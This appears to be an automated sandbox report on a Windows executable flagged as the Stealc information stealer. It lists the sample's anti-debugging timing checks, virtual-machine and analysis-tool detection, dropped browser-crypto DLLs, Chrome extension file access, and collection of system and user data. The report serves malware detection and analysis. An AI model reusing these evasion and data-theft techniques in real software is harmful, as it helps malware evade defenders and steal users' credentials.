Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035312 second address: 1035317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035317 second address: 103531D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034ED5 second address: 1034ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1053DB1 second address: 1053DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1053DB7 second address: 1053DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F5344E6BF59h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1053A86 second address: 1053A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106422C second address: 1064230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1064230 second address: 1064265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B32600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F5344B3260Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1064265 second address: 106426B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10632CB second address: 10632D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10632D1 second address: 106330E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5344E6BF4Bh 0x00000008 jmp 00007F5344E6BF52h 0x0000000d jmp 00007F5344E6BF4Ah 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F5344E6BF46h 0x0000001f jnp 00007F5344E6BF46h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106330E second address: 1063314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063314 second address: 106331E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5344E6BF46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063926 second address: 1063950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344B32608h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F5344B325FAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063950 second address: 1063957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063957 second address: 106397A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B32607h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F5344B325F6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063B0E second address: 1063B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5344E6BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063B1B second address: 1063B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B325FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5344B32608h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CA6 second address: 1063CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CAA second address: 1063CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CB0 second address: 1063CB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CB5 second address: 1063CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5344B32607h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CD7 second address: 1063CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CE5 second address: 1063CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5344B325F6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063CF6 second address: 1063CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063E70 second address: 1063E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065939 second address: 1065947 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068248 second address: 106824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106824D second address: 1068257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5344E6BF46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10687A9 second address: 10687E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5344B325F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5344B325FEh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dx, cx 0x00000016 push dword ptr [ebp+122D1ECEh] 0x0000001c mov dl, bl 0x0000001e call 00007F5344B325F9h 0x00000023 pushad 0x00000024 pushad 0x00000025 jmp 00007F5344B325FCh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10687E9 second address: 10687F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F5344E6BF46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10687F6 second address: 106883C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F5344B325FFh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F5344B325FAh 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push edx 0x0000001f pop edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 jnp 00007F5344B325F8h 0x00000029 push esi 0x0000002a pop esi 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e push edx 0x0000002f jnp 00007F5344B325FCh 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106883C second address: 1068853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F5344E6BF4Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106A182 second address: 106A190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F5344B32608h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51902E4 second address: 51902E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51902E8 second address: 5190305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B32609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190305 second address: 519030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519030B second address: 519031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, C193h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519031C second address: 5190322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190322 second address: 5190326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190326 second address: 519032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519032A second address: 519033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov si, dx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519033B second address: 519039D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5344F55AAFh 0x00000008 sub ch, 0000002Eh 0x0000000b jmp 00007F5344F55AB9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F5344F55AB3h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5344F55AB5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519039D second address: 51903AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5344E5026Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903AD second address: 51903B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903EF second address: 51903F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903F3 second address: 51903F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51903F9 second address: 5190470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5344E5026Ah 0x00000009 and cx, 05F8h 0x0000000e jmp 00007F5344E5026Bh 0x00000013 popfd 0x00000014 call 00007F5344E50278h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F5344E50271h 0x00000023 mov ebp, esp 0x00000025 jmp 00007F5344E5026Eh 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F5344E50277h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87FB0 second address: F87FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F881E3 second address: F881F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E5026Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F881F2 second address: F881FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5344F55AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F881FC second address: F88200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190D5C second address: 5190DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F5344F55AABh 0x0000000b and eax, 7E3C599Eh 0x00000011 jmp 00007F5344F55AB9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F5344F55AB1h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F5344F55AAEh 0x00000026 mov ebp, esp 0x00000028 jmp 00007F5344F55AB0h 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F5344F55AB7h 0x00000035 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DE1922 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F801EB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7E8F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DDF372 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1008524 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00B94910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00B8DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00B8E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00B8F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00B93EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00B816D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00B8BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00B938B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00B8ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B94570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00B94570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00B8DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B81160 GetSystemInfo,ExitProcess,

0_2_00B81160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1934685574.0000000001364000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware>d
Source: file.exe, 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14757
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13567
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13570
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13582
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13622
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13586

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B845C0 VirtualProtect ?,00000004,00000100,00000000

0_2_00B845C0

Source: C:\Users\user\Desktop\file.exe

0_2_00B99860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B99750 mov eax, dword ptr fs:[00000030h]

0_2_00B99750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B978E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_00B978E0

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 2484, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B99600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00B99600

Source: file.exe, 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o.$-WProgram Manager
Source: file.exe, file.exe, 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: .$-WProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00B97B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B97980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00B97980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B97850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00B97850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B97A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00B97A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707097418.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
